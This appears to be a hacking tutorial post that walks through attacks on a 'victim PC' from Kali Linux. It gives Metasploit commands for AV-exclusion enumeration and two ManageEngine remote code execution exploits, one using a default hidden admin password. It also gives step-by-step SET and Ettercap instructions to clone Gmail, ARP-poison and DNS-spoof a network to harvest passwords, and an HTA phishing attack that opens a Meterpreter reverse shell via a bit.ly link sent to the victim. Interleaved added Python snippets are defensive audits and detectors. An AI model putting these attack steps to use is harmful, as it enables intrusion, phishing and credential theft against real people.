How to Gather Antivirus Information from a Remote Victim PC Using Metasploit

First, hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use post/windows/gather/enum_av_excluded
msf exploit (enum_av_excluded)>set lhost 192.168.0.105 (IP of Local Host)
msf exploit (enum_av_excluded)>set session 1
msf exploit (enum_av_excluded)>exploit
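
Added example (not part of the original post or the Metasploit module): the same four exclusion types can be reviewed from the defender's side, since every broad exclusion is a place where the AV will not look. The inventory below is constructed, and the RISKY_* and USER_WRITABLE rules are an assumed review policy.

```python
import ntpath

# Constructed sample: exclusions grouped by the four types the module reports.
SAMPLE = {
    "file": [r"C:\App\data\cache.db"],
    "directory": ["C:\\", r"C:\Users\Public", r"D:\SQLData"],
    "process": ["powershell.exe", r"C:\App\bin\svc.exe"],
    "extension": [".exe", "ldf"],
}

# Assumed review policy for this example, not a vendor rule set.
RISKY_EXTENSIONS = {"exe", "dll", "ps1", "bat", "cmd", "js", "vbs", "hta", "scr"}
RISKY_PROCESSES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe"}
USER_WRITABLE = ("c:\\users", "c:\\windows\\temp", "c:\\programdata", "c:\\temp")


def audit_exclusions(inventory):
    """Return (entry, reason) for every exclusion that creates a scan blind spot."""
    findings = []
    for path in inventory.get("directory", []) + inventory.get("file", []):
        norm = ntpath.normpath(path).lower()
        root = norm.rstrip("\\")
        if len(root) == 2 and root[1] == ":":
            findings.append((path, "entire drive excluded"))
        elif "*" in norm or "?" in norm:
            findings.append((path, "wildcard path"))
        elif any(norm == p or norm.startswith(p + "\\") for p in USER_WRITABLE):
            findings.append((path, "user-writable location"))
    for proc in inventory.get("process", []):
        if ntpath.basename(proc).lower() in RISKY_PROCESSES:
            findings.append((proc, "script host or LOLBin process"))
    for ext in inventory.get("extension", []):
        if ext.lstrip(".").lower() in RISKY_EXTENSIONS:
            findings.append((ext, "executable or script extension"))
    return findings


if __name__ == "__main__":
    for entry, reason in audit_exclusions(SAMPLE):
        print(f"{entry}: {reason}")
```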

Hack Remote Windows PC using ManageEngine OpManager Remote Code Execution

This module exploits a default credential vulnerability in ManageEngine OpManager, where a default hidden account "IntegrationUser" with administrator privileges exists. The account has a default password of "plugin" which cannot be reset through the user interface. By logging in and abusing the default administrator's SQL query functionality, it's possible to write a WAR payload to disk and trigger an automatic deployment of this payload. This module has been tested successfully on OpManager v11.5 and v11.6 for Windows.

Exploit Targets
Windows 7
ManageEngine OpManager v11.6


Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/http/manage_engine_opmanager_rce
msf exploit (manage_engine_opmanager_rce)>set lhost 192.168.0.106 (IP of Local Host)
msf exploit (manage_engine_opmanager_rce)>set rhost 192.168.0.104
msf exploit (manage_engine_opmanager_rce)>exploit


Hack Remote Windows PC using ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability

This module exploits a vulnerability found in ManageEngine Desktop Central 9. When a 7z file is uploaded, the FileUploadServlet class does not check the user-controlled ConnectionId parameter. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. Please note that by default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in the file rdslog0.txt. This exploit was successfully tested on version 9, build 90109 and build 91084.

Exploit Targets
Windows 7
ManageEngine Desktop Central 9

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/http/manageengine_connectionid_write
msf exploit (manageengine_connectionid_write)>set lhost 192.168.1.33 (IP of Local Host)
msf exploit (manageengine_connectionid_write)>set rhost 192.168.1.4
msf exploit (manageengine_connectionid_write)>exploit
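
Added example (not from the original post or from ManageEngine): the missing check described above, written as a validator for the ConnectionId value plus a scanner that applies it to request lines. The request path, the "file" parameter, the sample lines and the allow-list format are all assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumption for this example: a legitimate ConnectionId is a short token of
# letters, digits, '-' and '_'. The page does not give the product's real format.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Constructed request lines; the path and the "file" parameter are placeholders.
SAMPLE_LINES = [
    "POST /upload-endpoint?ConnectionId=session_4821&file=inventory.7z HTTP/1.1",
    "POST /upload-endpoint?ConnectionId=session_4821%00&file=inventory.7z HTTP/1.1",
    "POST /upload-endpoint?connectionid=a%2500 HTTP/1.1",
]


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is seen too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def connection_id_problems(raw_value):
    """List the reasons a raw ConnectionId value must be rejected (empty = OK)."""
    value = fully_decode(raw_value)
    problems = []
    if "\x00" in value:
        problems.append("null byte")
    if "/" in value or "\\" in value or ".." in value:
        problems.append("path characters")
    if not SAFE_ID.fullmatch(value):
        problems.append("outside allow-list")
    return problems


def scan_requests(lines):
    """Return (line_number, problems) for requests carrying a bad ConnectionId."""
    hits = []
    for number, line in enumerate(lines, 1):
        parts = line.split(" ")
        if len(parts) < 2:
            continue
        for pair in urlsplit(parts[1]).query.split("&"):
            name, _, raw = pair.partition("=")
            if name.lower() == "connectionid" and connection_id_problems(raw):
                hits.append((number, connection_id_problems(raw)))
    return hits
```

Because the description says the exploit leaves FileUploadServlet debugging output in rdslog0.txt, that file is a second place to review alongside the web access log.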

Hack Gmail and Facebook of Remote PC using DNS Spoofing and SET Toolkit.

First, open the Kali Linux Applications tab, go to Exploitation Tools, and choose SET Toolkit.


Now choose option 1, “Social-Engineering Attacks”, and press Enter.


Then choose option 2, “Website Attack Vectors”, and press Enter.


After that choose option 3, “Credential Harvester Attack Method”, and press Enter.


Now choose option 2, “Site Cloner”, and press Enter.


For the POST back, type your IP address and press Enter. After that, type the name of the website you want to clone (in my case I am using Gmail).


The cloned web page will be saved in the /var/www folder.


Now move the cloned files of the fake page (e.g. harvester, post & index.html) into the /var/www/html folder.


Now right-click on the harvester .txt file and give it read and write permission.


Now open the etter.dns file, which is in the /etc/ettercap folder.


Modify the contents of etter.dns and add your own PC's IP address as an A record.


Now Open Ettercap and go to Sniff and choose Unified sniffing.


Select your network interface (in my case the interface is eth0).


Now go to Hosts and select Scan for hosts. It will show you the PCs connected to your network.


Select Host list and select your target, then click on Add to Target 1 (if you want to select more than one target, select the next target and click on Add to Target again).


Open Mitm option and select ARP poisoning...


A pop-up will appear; tick the Sniff remote connections box and hit OK.


Select Plugins and choose Manage the plugins.


In the Plugins option, double-click on dns_spoof. (It will start DNS spoofing.)

Click on Start and select Start sniffing.


Now, when the victim opens any web page, it will be redirected to the fake page you created.
When the victim enters their ID and password, you will get all the details.


The victim's ID and password will be saved in /var/www/html/harvester.txt.
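
Added example (not part of the original post): what the ARP poisoning and dns_spoof steps above look like from a monitored client, and how to flag them. The ARP cache entries, DNS answers, subnet and internal name suffixes are constructed sample data and assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed observations from one client on a 192.168.0.0/24 LAN.
ARP_CACHE = [  # (ip, mac) pairs as read from the client's ARP cache
    ("192.168.0.1", "00:11:22:33:44:55"),    # gateway
    ("192.168.0.105", "00:11:22:33:44:55"),  # second IP answering with the same MAC
    ("192.168.0.110", "66:77:88:99:AA:BB"),
]
DNS_ANSWERS = [  # (queried name, A record received)
    ("accounts.example.com", "192.168.0.105"),
    ("mail.example.net", "192.168.0.77"),
    ("www.example.org", "203.0.113.10"),
    ("printer.office.lan", "192.168.0.50"),
]


def mac_conflicts(arp_entries):
    """MACs that answer for more than one IP, the trace ARP poisoning leaves."""
    by_mac = defaultdict(set)
    for ip, mac in arp_entries:
        by_mac[mac.lower()].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def spoofed_answers(dns_answers, lan, internal_suffixes=(".lan", ".local")):
    """Public names whose A record points into the local subnet."""
    net = ipaddress.ip_network(lan)
    return [(name, ip) for name, ip in dns_answers
            if ipaddress.ip_address(ip) in net
            and not name.lower().endswith(internal_suffixes)]


def assess(arp_entries, dns_answers, lan, gateway):
    """Rate each suspicious DNS answer; 'high' if its IP shares the gateway's MAC."""
    conflicts = mac_conflicts(arp_entries)
    shares_gateway_mac = {ip for ips in conflicts.values() if gateway in ips
                          for ip in ips if ip != gateway}
    return [(name, ip, "high" if ip in shares_gateway_mac else "medium")
            for name, ip in spoofed_answers(dns_answers, lan)]


if __name__ == "__main__":
    for finding in assess(ARP_CACHE, DNS_ANSWERS, "192.168.0.0/24", "192.168.0.1"):
        print(finding)
```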

Hack Remote PC using HTA Attack in SET Toolkit

The HTA Attack method will allow you to clone a site and perform powershell injection through HTA files which can be used for Windows-based powershell exploitation through the browser.


First, open the Kali Linux Applications tab, go to Post Exploitation, and choose SET Toolkit.


Now choose option 1, “Social-Engineering Attacks”.


Now choose option 2, “Website Attack Vectors”.


Now choose option 8, “HTA Attack Method”.


Enter the IP address to connect back on: 192.168.0.125 (IP address of Your PC)

Now select the payload; I chose 1, Meterpreter reverse TCP.


Now we will choose option 2, “Site Cloner”, and type the name of the site you want to clone. The MSF listener will start automatically.


Now you will get index.html and launcher.hta in /var/www directory.


Now move both files to the /var/www/html directory.


Now convert your URL into Bitly URL using bit.ly and send this link address to your victim via Email or Chat


When the victim machine browses to the Bitly URL, it will show a prompt to Keep/Discard.


Now you will get the meterpreter session of the victim PC. Type sessions -l to display the sessions opened when the victim opens the link.

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
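
Added example (not part of the original post or of SET): since the HTA method runs PowerShell from an HTA file, the process tree on the victim shows a script interpreter descending from mshta.exe, which is what the detection below looks for. The events are constructed, with field names chosen for this example rather than taken from a specific logging product.

```python
import ntpath

# Interpreters that should not normally descend from mshta.exe (assumed list).
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation events: pid, parent pid, image path.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Browser\browser.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 500, "ppid": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def image_name(event):
    return ntpath.basename(event["image"]).lower()


def hta_descendants(events):
    """Return (pid, ancestry) for interpreters with mshta.exe anywhere above them."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for event in events:
        if image_name(event) not in SCRIPT_CHILDREN:
            continue
        chain, seen = [image_name(event)], {event["pid"]}
        parent = by_pid.get(event["ppid"])
        # Walk up the tree so indirect chains (mshta -> cmd -> powershell) are caught.
        while parent and parent["pid"] not in seen:
            seen.add(parent["pid"])
            chain.append(image_name(parent))
            if image_name(parent) == "mshta.exe":
                alerts.append((event["pid"], " <- ".join(chain)))
                break
            parent = by_pid.get(parent["ppid"])
    return alerts


if __name__ == "__main__":
    for pid, ancestry in hta_descendants(EVENTS):
        print(pid, ancestry)
```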